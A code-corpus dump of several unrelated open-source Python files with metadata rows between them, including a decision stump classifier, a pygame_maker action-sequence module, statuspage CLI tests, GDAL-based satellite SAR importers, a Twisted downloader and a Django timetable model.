ROOT.kCyan))
# Plot multiple background components specified by multiple regular
# expressions on name
model.plotOn(
xframe2,
ROOT.RooFit.Components("bkg1,sig*"),
ROOT.RooFit.LineStyle(
ROOT.kDashed),
ROOT.RooFit.LineColor(
ROOT.kYellow),
ROOT.RooFit.Invisible())
# Draw the frame on the canvas
c = ROOT.TCanvas("rf205_compplot", "rf205_compplot", 800, 400)
c.Divide(2)
c.cd(1)
ROOT.gPad.SetLeftMargin(0.15)
xframe.GetYaxis().SetTitleOffset(1.4)
xframe.Draw()
c.cd(2)
ROOT.gPad.SetLeftMargin(0.15)
xframe2.GetYaxis().SetTitleOffset(1.4)
xframe2.Draw()
c.SaveAs("rf205_compplot.png")
| lgpl-2.1 | -1,549,633,416,669,288,700 | 31.985507 | 82 | 0.672012 | false | 2.931101 | false | false | false |
VCG/gp | raveler/ray/ray/decision_stump.py | 3 | 2202 |
import math
import numpy
import operator
class DecisionStump():
""" Class for a decision stump, adapted from pyclassic. """
def fit(self, X, Y, w):
feature_index, stump = train_decision_stump(X,Y,w)
self.feature_index = feature_index
self.stump = stump
return self
def predict(self,X):
if len(X.shape)==1:
X = numpy.array([X])
N, d = X.shape
feature_index = self.feature_index
threshold = self.stump.threshold
s = self.stump.s
return s*(2.0*(X[:,feature_index]>threshold).astype(numpy.uint8)-1)
class Stump:
"""1D stump"""
def __init__(self, score, threshold, s):
self.score = score
self.threshold = threshold
self.s = s
def __cmp__(self, other):
return cmp(self.err, other.err)
def train_decision_stump(X,Y,w):
stumps = [build_stump_1d(x,Y,w) for x in X.T]
feature_index = numpy.argmax([s.score for s in stumps])
best_stump = stumps[feature_index]
best_threshold = best_stump.threshold
return feature_index, best_stump
def build_stump_1d(x,y,w):
idx = x.argsort()
xsorted = x[idx]
wy = y[idx]*w[idx]
wy_pos = numpy.clip(wy, a_min=0, a_max=numpy.inf)
wy_neg = numpy.clip(wy, a_min=-numpy.inf, a_max=0)
score_left_pos = numpy.cumsum(wy_pos)
score_right_pos = numpy.cumsum(wy_pos[::-1])
score_left_neg = numpy.cumsum(wy_neg)
score_right_neg = numpy.cumsum(wy_neg[::-1])
score1 = -score_left_pos[0:-1:1] + score_right_neg[-2::-1]
score2 = -score_left_neg[0:-1:1] + score_right_pos[-2::-1]
# using idx will ensure that we don't split between nodes with identical x values
idx = numpy.nonzero((xsorted[:-1] < xsorted[1:]).astype(numpy.uint8))[0]
if len(idx)==0:
return Stump(-numpy.inf, 0, 0)
score = numpy.where(abs(score1)>abs(score2), score1, score2)
ind = idx[numpy.argmax(abs(score[idx]))]
maxscore = abs(score[ind])
threshold = (xsorted[ind] + xsorted[ind+1])/2.0
s = numpy.sign(score[ind]) # direction of -1 -> 1 change
return Stump(maxscore, threshold, s)
| mit | 3,073,037,846,525,142,000 | 30.382353 | 85 | 0.589918 | false | 3.020576 | false | false | false |
rlc2/pygame_maker | pygame_maker/actions/action_sequence.py | 1 | 21092 | """
Author: Ron Lockwood-Childs
Licensed under LGPL v2.1 (see file COPYING for details)
Container type for sequences of actions.
"""
import re
from pygame_maker.actions.action import Action, ActionException
__all__ = ["ActionSequence", "ActionSequenceStatement",
"ActionSequenceConditional", "ActionSequenceConditionalIf",
"ActionSequenceConditionalElse", "ActionSequenceBlock",
"ActionSequenceStatementException"]
class ActionSequenceStatementException(Exception):
"""
Raised when unknown action names or something other than an action is found
in a sequence, when sequence statements are placed incorrectly, or when an
attempt is made to add something other than an ActionSequenceStatement to a
sequence.
"""
pass
class ActionSequenceStatement(object):
"""
The base class for all action sequence statements.
A "statement" wraps an action and provides structure to represent if/else
conditionals and blocks along with normal executable statements.
:param action: The action to wrap into the statement
:type action: Action
"""
@staticmethod
def get_sequence_item_from_action(action, **kwargs):
"""
Given a name or Action, retrieve its ActionSequenceStatement.
Provide a simple static method to retrieve the right statement
representing the given action: if/else condition, block, or
executable statement. Can also accept a string containing the name
of the action, in which case a new action will be retrieved with
its parameters filled in with the supplied kwargs.
:param action: An action name, or Action instance
:type action: str|Action
:param kwargs: Optional keyword arguments to apply to the named action
:return: The appropriate action sequence statement
:rtype: ActionSequenceStatement
"""
# if given a string, see if it names a known action
new_action = None
if isinstance(action, str):
try:
new_action = Action.get_action_instance_by_name(action, **kwargs)
except ActionException:
raise ActionSequenceStatementException("'{}' is not a known action".format(action))
else:
new_action = action
if not isinstance(new_action, Action):
raise ActionSequenceStatementException("'{}' is not a recognized action")
if new_action.nest_adjustment:
if new_action.name == "else":
return ActionSequenceConditionalElse(new_action)
minfo = Action.IF_STATEMENT_RE.search(new_action.name)
if minfo:
return ActionSequenceConditionalIf(new_action)
if new_action.nest_adjustment != "block_end":
return ActionSequenceBlock(new_action)
return ActionSequenceStatement(new_action)
def __init__(self, action):
self.is_block = False
self.is_conditional = False
self.action = action
def get_action_list(self):
"""
Return the statement's action list.
This method places the action inside a list of length 1.
This aids with unit testing, and it allows an action sequence to be
serialized to storage. The deserialized simple list can be expanded
into an action sequence when the application starts up.
:return: A single-element list containing the wrapped action
:rtype: list
"""
return [self.action]
def pretty_print(self, indent=0):
"""
Display the name of the wrapped action as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
indent_string = "\t" * indent
print("{}{}".format(indent_string, self.action.name))
def __repr__(self):
return "<{}: {}>".format(type(self).__name__, self.action)
class ActionSequenceConditional(ActionSequenceStatement):
"""
Represent a simple conditional ('else' is the only kind this fits).
:param action: The action to wrap into the conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceStatement.__init__(self, action)
self.is_conditional = True
self.contained_statement = None
def add_statement(self, statement):
"""
Attempt to add a statement to the conditional.
Given a statement, try to add it to the current conditional. If the
clause is empty, set its statement. If the clause holds an open
block or conditional, pass it on.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
# basic type check
if not isinstance(statement, ActionSequenceStatement):
raise ActionSequenceStatementException
if not self.contained_statement:
# the statement is now the conditional clause
self.contained_statement = statement
elif (self.contained_statement.is_block and
not self.contained_statement.is_block_closed):
# the statement fits within the conditional clause's block
self.contained_statement.add_statement(statement)
elif (self.contained_statement.is_conditional and
self.contained_statement.add_statement(statement)):
# the contained conditional found a place for the statement
pass
else:
found_place = False
return found_place
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a simple
conditional into a simple list. This aids with unit testing and
allows an action sequence to be serialized to storage. The
deserialized simple list can be expanded into an action sequence
when the application starts up.
:return: A list containing the conditional's wrapped actions
:rtype: list
"""
contained_list = []
if self.contained_statement:
contained_list = self.contained_statement.get_action_list()
return [self.action] + contained_list
def pretty_print(self, indent=0):
"""
Display an action sequence simple conditional as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceStatement.pretty_print(self, indent)
if self.contained_statement:
self.contained_statement.pretty_print(indent+1)
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
repr_str += "\t{}>".format(self.contained_statement)
return repr_str
class ActionSequenceConditionalIf(ActionSequenceConditional):
"""
Represent an entire if/else conditional.
The 'else' clause is also placed here, to avoid having to search earlier
statements to see if there is a free 'if' conditional that matches the
'else'.
:param action: The action to wrap into the 'if' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
self.else_condition = None
def add_statement(self, statement):
"""
Attempt to place the given statement into the clause for the 'if'.
If there is already a block or another conditional, see if the new
statement will be accepted there. If not, check whether the new
statement is an 'else' condition, and that no 'else' condition already
exists. If there is an 'else' condition that hasn't received a
statement yet, add it there. If the 'else' statement exists and
contains another conditional or block, see if the new statement
will be accepted there.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
if not ActionSequenceConditional.add_statement(self, statement):
if (not self.else_condition and
isinstance(statement, ActionSequenceConditionalElse)):
self.else_condition = statement
elif (self.else_condition and self.else_condition.is_conditional and
self.else_condition.add_statement(statement)):
# else clause had a place for the new statement
pass
elif (self.else_condition and self.else_condition.is_block and
not self.else_condition.is_block_closed):
self.else_condition.add_statement(statement)
else:
found_place = False
return found_place
def pretty_print(self, indent=0):
"""
Display an action sequence if/else conditional as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceConditional.pretty_print(self, indent)
if self.else_condition:
self.else_condition.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a Conditional.
:return: Generator function
:rtype: generator
"""
yield self.action
conditional_path = None
if self.action.action_result:
if not self.contained_statement:
# incomplete "if" path (can only happen to final action in list)
return
conditional_path = self.contained_statement
else:
if not self.else_condition:
# "if" not executed, and no "else" path
return
# no need to return the "else" action itself, it does nothing
conditional_path = self.else_condition.contained_statement
if conditional_path.is_block or conditional_path.is_conditional:
for action in conditional_path.walk():
yield action
else:
yield conditional_path.action
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
conditional into a simple list. This aids with unit
testing and allows an action sequence to be serialized
to storage. The deserialized simple list can be expanded into an
action sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
contained_list = ActionSequenceConditional.get_action_list(self)
else_list = []
if self.else_condition:
else_list = self.else_condition.get_action_list()
return contained_list + else_list
def __repr__(self):
repr_str = "<{} {}:\n".format(type(self).__name__, self.action)
repr_str += "\t{}\n".format(self.contained_statement)
if self.else_condition:
repr_str += "{}>".format(self.else_condition)
return repr_str
class ActionSequenceConditionalElse(ActionSequenceConditional):
"""
Clone of the ActionSequenceConditional class.
Named for convenience to be used in a ActionSequenceConditionalIf.
:param action: The action to wrap into the 'else' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
class ActionSequenceBlock(ActionSequenceStatement):
"""
Represent a block of action statements.
All statements are placed into a block (even if just the 'main' block) or
into conditionals within a block. The first action in the main block
is set to None.
:param action: Usually a start_of_block action
:type action: Action|None
:param main_block: True if this is the main (outermost) block
:type main_blocK: bool
"""
def __init__(self, action, main_block=False):
# main block doesn't start with an explicit action, so action==None
# is ok. Remember this when trying to use self.action in any
# methods, including superclasses!
ActionSequenceStatement.__init__(self, action)
self.is_block = True
self.is_block_closed = False
self.contained_statements = []
self.main_block = main_block
def _append_statement(self, statement):
# Called by add_statement() when an action is meant for this block.
#
# :param statement: New statement to add to the block
# :type statement: ActionSequenceStatement
# the main block is never explicitly "closed"
if statement.action and statement.action.nest_adjustment == "block_end":
if not self.main_block:
self.is_block_closed = True
self.contained_statements.append(statement)
else:
raise ActionSequenceStatementException("block_end cannot be added to a main block")
elif isinstance(statement, ActionSequenceConditionalElse):
raise ActionSequenceStatementException
else:
self.contained_statements.append(statement)
def add_statement(self, statement):
"""
Add a new statement to an open block.
The action sequence "magic" happens here. Normal statements, "if"
conditionals and blocks can be added to the current block. Open
conditionals (no clause yet) or blocks (no "block_end" action) can
receive new statements. An "else" action can be attached to an "if"
conditional. All statements exist either inside a block (there is
always a "main" block) or a conditional.
:param statement: New statement to add to the block
:type statement: ActionSequenceStatement
"""
# print("Adding statement: {} .. ".format(statement))
if not isinstance(statement, ActionSequenceStatement):
raise TypeError("{} is not an ActionSequenceStatement".format(str(statement)))
last_statement = None
if self.contained_statements:
last_statement = self.contained_statements[-1]
if last_statement and last_statement.is_conditional:
# If the last statement's conditional is still open, this statement
# belongs there. Otherwise, add it to this block
if last_statement.add_statement(statement):
# print("---> to last conditional")
return
if last_statement and last_statement.is_block:
# If the last statement's block is still open, this statement
# belongs there. Otherwise, add it to this block
if not last_statement.is_block_closed:
# print("---> to last block")
last_statement.add_statement(statement)
return
# print("---> to current block")
self._append_statement(statement)
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
block into a simple list. This aids with unit testing
and allows an action sequence to be serialized to storage.
The deserialized simple list can be expanded into an action
sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
this_action = []
if not self.main_block:
this_action = [self.action]
contained_list = []
if self.contained_statements:
for contained in self.contained_statements:
contained_list += contained.get_action_list()
return this_action + contained_list
def pretty_print(self, indent=0):
"""
Display the action sequence block as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
new_indent = indent
if not self.main_block:
ActionSequenceStatement.pretty_print(self, indent)
new_indent += 1
if self.contained_statements:
for contained in self.contained_statements:
if contained.action.nest_adjustment != "block_end":
contained.pretty_print(new_indent)
else:
contained.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a block.
:return: Generator function
:rtype: generator
"""
for statement in self.contained_statements:
if statement.action is None:
continue
if statement.action.nest_adjustment == "block_end":
return
if statement.is_conditional or statement.is_block:
for sub_statement_action in statement.walk():
yield sub_statement_action
else:
yield statement.action
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
for statement in self.contained_statements:
repr_str += "{}\n".format(statement)
repr_str += ">"
return repr_str
class ActionSequence(object):
"""Store a sequence of actions, which runs when triggered by an event."""
FIRST_ITEM_RE = re.compile(r"^\s*([^ ])")
@staticmethod
def load_sequence_from_yaml_obj(sequence_repr):
"""
Create an event action sequence from its YAML representation.
The expected format is as follows::
[{<action_name>: { <action_param>:<action_value>, .. }, ..., ]
:param sequence_repr: The YAML object containing action sequence data
:type sequence_repr: yaml.load() result
:return: The action sequence described in the YAML object
:rtype: ActionSequence
"""
new_sequence = None
if sequence_repr:
new_sequence = ActionSequence()
for action_hash in sequence_repr:
action_name = list(action_hash.keys())[0]
action_params = {}
if action_hash[action_name]:
action_params.update(action_hash[action_name])
next_action = Action.get_action_instance_by_name(action_name, **action_params)
# print("New action: {}".format(next_action))
new_sequence.append_action(next_action)
return new_sequence
def __init__(self):
"""Wrap the outermost ActionSequenceBlock."""
#: The main block, containing all actions in sequence
self.main_block = ActionSequenceBlock(None, True)
def append_action(self, action):
"""
Add a new action to the end of the sequence.
:param action: The name of a defined action, or an Action instance
:type action: str|Action
"""
statement = ActionSequenceStatement.get_sequence_item_from_action(action)
self.main_block.add_statement(statement)
def get_next_action(self):
"""
Iterate through every action in the ActionSequence.
:return: Generator function
:rtype: generator
"""
for next_action in self.main_block.walk():
if next_action is not None:
yield next_action
def to_yaml(self, indent=0):
"""
Produce the YAML representation of the action sequence.
:param indent: Number of spaces to indent each line
:type indent: int
:return: YAML string
:rtype: str
"""
action_list = self.main_block.get_action_list()
sequence_yaml = ""
for action in action_list:
action_yaml_lines = action.to_yaml(indent).splitlines()
for idx, aline in enumerate(action_yaml_lines):
if idx == 0:
sline = str(aline)
minfo = self.FIRST_ITEM_RE.search(aline)
# print("first item match for '{}': {}".format(aline, minfo))
if minfo:
mpos = minfo.start(1)
# print("match pos:{}".format(mpos))
sline = "{}- {}".format(aline[0:mpos], aline[mpos:])
else:
sline = "- {}".format(aline)
sequence_yaml += "{}\n".format(sline)
else:
sequence_yaml += " {}\n".format(aline)
return sequence_yaml
def pretty_print(self):
"""Print out properly-indented action sequence strings."""
self.main_block.pretty_print()
def __repr__(self):
return "{}".format(str(self.main_block))
| lgpl-2.1 | -3,735,501,381,617,849,000 | 37.630037 | 99 | 0.619856 | false | 4.718568 | false | false | false |
mattfleaydaly/newstatuslive | statuspage/tests.py | 2 | 7197 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from datetime import datetime
from unittest import TestCase
from mock import patch, Mock
from click.testing import CliRunner
from statuspage import cli, update, create, iter_systems, get_severity, SYSTEM_LABEL_COLOR
from github import UnknownObjectException
import codecs
class CLITestCase(TestCase):
def setUp(self):
self.patcher = patch('statuspage.Github')
self.gh = self.patcher.start()
# setup mocked label
self.label = Mock()
self.label.color = "171717"
self.label.name = "Website"
self.label1 = Mock()
self.label1.color = "171717"
self.label1.name = "API"
self.gh().get_user().get_repo().get_labels.return_value = [self.label, self.label1]
# set up mocked issue
self.issue = Mock()
self.issue.created_at = datetime.now()
self.issue.state = "open"
self.issue_label = Mock()
self.issue_label.color = "FF4D4D"
self.issue_label.name = "major outage"
self.issue.get_labels.return_value = [self.issue_label, self.label]
self.issue.user.login = "some-dude"
self.comment = Mock()
self.comment.user.login = "some-dude"
self.issue.get_comments.return_value = [self.comment, ]
self.issue1 = Mock()
self.issue1.created_at = datetime.now()
self.issue1.state = "open"
self.issue1.user.login = "some-dude"
self.issue1.get_labels.return_value = [self.issue_label, self.label1]
self.issue1.get_comments.return_value = [self.comment, ]
self.gh().get_user().get_repo().get_issues.return_value = [self.issue, self.issue1]
self.template = Mock()
self.template.decoded_content = b"some foo"
self.template.content = codecs.encode(b"some other foo", "base64")
self.gh().get_user().get_repo().get_file_contents.return_value = self.template
self.gh().get_organization().get_repo().get_file_contents.return_value = self.template
self.collaborator = Mock()
self.collaborator.login = "some-dude"
self.gh().get_user().get_repo().get_collaborators.return_value = [self.collaborator,]
self.gh().get_organization().get_repo().get_collaborators.return_value = [self.collaborator,]
def tearDown(self):
self.patcher.stop()
@patch("statuspage.run_update")
def test_create(self, run_update):
label = Mock()
self.gh().get_user().create_repo().get_labels.return_value = [label,]
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
@patch("statuspage.run_update")
def test_create_org(self, run_update):
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo",
"--token", "token",
"--systems", "sys1,sys2",
"--org", "some"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization.assert_called_with("some")
def test_update(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
def test_dont_update_when_nothing_changes(self):
runner = CliRunner()
self.template.content = codecs.encode(b"some foo", "base64")
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().update_file.assert_not_called()
def test_update_org(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token", "--org", "some"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization().get_repo.assert_called_with(name="testrepo")
self.gh().get_organization().get_repo().get_labels.assert_called_once_with()
def test_update_index_does_not_exist(self):
self.gh().get_user().get_repo().update_file.side_effect = UnknownObjectException(status=404, data="foo")
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().create_file.assert_called_once_with(
branch='gh-pages',
content='some foo',
message='initial',
path='/index.html'
)
def test_update_non_labeled_issue_not_displayed(self):
self.issue.get_labels.return_value = []
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
def test_update_non_colaborator_issue_not_displayed(self):
self.issue.user.login = "some-other-dude"
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
class UtilTestCase(TestCase):
def test_iter_systems(self):
label1 = Mock()
label2 = Mock()
label1.name = "website"
label1.color = SYSTEM_LABEL_COLOR
self.assertEqual(
list(iter_systems([label1, label2])),
["website", ]
)
self.assertEqual(
list(iter_systems([label2])),
[]
)
def test_severity(self):
label1 = Mock()
label2 = Mock()
label1.color = "FF4D4D"
self.assertEqual(
get_severity([label1, label2]),
"major outage"
)
label1.color = "000000"
self.assertEqual(
get_severity([label1, label2]),
None
)
if __name__ == '__main__':
unittest.main() | mit | 3,852,729,542,538,435,000 | 32.95283 | 112 | 0.599139 | false | 3.611139 | true | false | false |
birgander2/PyRAT | pyrat/load/Spaceborne_GDAL.py | 1 | 8118 | import pyrat, os
import logging
from osgeo import gdal
import glob
import numpy as np
class ENVISAT(pyrat.ImportWorker):
"""
Import of ENVISAT satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'ENVISAT'}
para = [{'var': 'file', 'value': '', 'type': 'openfile', 'text': 'Product file (*.N1)'}]
def __init__(self, *args, **kwargs):
super(ENVISAT, self).__init__(*args, **kwargs)
self.name = "ENVISAT IMPORT"
if len(args) == 1:
self.file = args[0]
def getsize(self, *args, **kwargs):
self.ds = gdal.Open(self.file)
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
if len(array) == 1:
return array[0]
else:
return array
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "ENVISAT"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(ENVISAT)
def envisat(*args, **kwargs):
return ENVISAT(*args, **kwargs).run(*args, **kwargs)
class PALSAR(pyrat.ImportWorker):
"""
Import of PALSAR satellite data. Only level 1.1. and 1.5 are supported.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'PALSAR'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(PALSAR, self).__init__(*args, **kwargs)
self.name = "PALSAR IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/VOL*")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: volume file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "PALSAR"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(PALSAR)
def palsar(*args, **kwargs):
return PALSAR(*args, **kwargs).run(*args, **kwargs)
class Radarsat2(pyrat.ImportWorker):
"""
Import of Radarsat-2 satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Radarsat-2'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Radarsat2, self).__init__(*args, **kwargs)
self.name = "RADARSAT-2 IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/product.xml")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: product.xml file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "Radarsat-2"
metain = self.ds.GetMetadata()
meta.update(metain)
meta['CH_pol'] = []
for band in self.band:
metain = band.GetMetadata()
meta['CH_pol'].append(metain['POLARIMETRIC_INTERP'])
meta.update(metain)
return meta
@pyrat.docstringfrom(Radarsat2)
def radarsat2(*args, **kwargs):
return Radarsat2(*args, **kwargs).run(*args, **kwargs)
class Sentinel1(pyrat.ImportWorker):
"""
Very basic import of Sentinel-1 satellite data. The current driver uses GDAL and therefore does not
perform debursting and combination of subswaths. This routine needs to be improved in future.
**author:** Andreas Reigber\n
**status:** --beta-- Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Sentinel-1 (primitive)'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Sentinel1, self).__init__(*args, **kwargs)
self.name = "SENTINEL-1 IMPORT"
def reader(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/manifest.safe")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
nswath = len(self.band)
YSize = [band.YSize for band in self.band]
XSize = [band.XSize for band in self.band]
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: manifest.save file not found!")
return False, False
array = []
for band in self.band:
array.append(band.ReadAsArray())
meta = {}
meta['sensor'] = "Sentinel-1"
metain = self.ds.GetMetadata()
meta.update(metain)
return array, meta
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def sentinel1(*args, **kwargs):
return Sentinel1(*args, **kwargs).run(*args, **kwargs)
| mpl-2.0 | -4,090,027,154,837,745,700 | 32.825 | 103 | 0.559128 | false | 3.566784 | false | false | false |
fairbird/OpenPLI-BlackHole | lib/python/Components/Downloader.py | 1 | 2347 | from twisted.web import client
from twisted.internet import reactor, defer, ssl
from urlparse import urlparse
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers = None):
client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent='STB HTTP Downloader')
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == '304':
print reason.getErrorMessage()
client.HTTPDownloader.page(self, '')
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == '200':
if headers.has_key('content-length'):
self.totalbytes = int(headers['content-length'][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == '200':
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory = None, *args, **kwargs):
parsed = urlparse(url)
scheme = parsed.scheme
host = parsed.hostname
port = parsed.port or (443 if scheme == 'https' else 80)
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
self.connection = reactor.connectSSL(host, port, self.factory, contextFactory)
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
print '[stop]'
self.connection.disconnect()
def addProgress(self, progress_callback):
print '[addProgress]'
self.factory.progress_callback = progress_callback
| gpl-2.0 | -88,920,652,326,574,430 | 35.107692 | 104 | 0.633149 | false | 4.275046 | false | false | false |
memclutter/clinic-crm | src/timetables/models.py | 1 | 1135 | from django.db import models
class Timetable(models.Model):
DW_MON = 0
DW_TUE = 1
DW_WED = 2
DW_THU = 3
DW_FRI = 4
DAY_OF_WEEK_CHOICES = (
(DW_MON, 'Monday'),
(DW_TUE, 'Tuesday'),
(DW_WED, 'Wednesday'),
(DW_THU, 'Thursday'),
(DW_FRI, 'Friday'),
)
day_of_week = models.IntegerField(choices=DAY_OF_WEEK_CHOICES, null=False, blank=False)
start_time = models.TimeField(null=False, blank=False)
end_time = models.TimeField(null=False, blank=False)
break_start_time = models.TimeField(null=False, blank=False)
break_end_time = models.TimeField(null=False, blank=False)
doctor = models.ForeignKey('clinic.Doctor', on_delete=models.CASCADE)
def __str__(self):
return 'Timetable for "%s" %s %s-%s (%s-%s)' % (
str(self.doctor),
dict(Timetable.DAY_OF_WEEK_CHOICES)[self.day_of_week],
self.start_time,
self.end_time,
self.break_start_time,
self.break_end_time,
)
class Meta:
unique_together = [
['doctor', 'day_of_week'],
]
| bsd-2-clause | 6,153,335,067,055,088,000 | 28.102564 | 91 | 0.56652 | false | 3.092643 | false | false | false |
jorgenschaefer/monads-for-normal-programmers | monads/mathop/test_mathop.py | 1 | 1530 | import unittest
class MathopTest(unittest.TestCase):
CLASS = None
def setUp(self):
if self.CLASS is None:
raise unittest.SkipTest("Base class not tested")
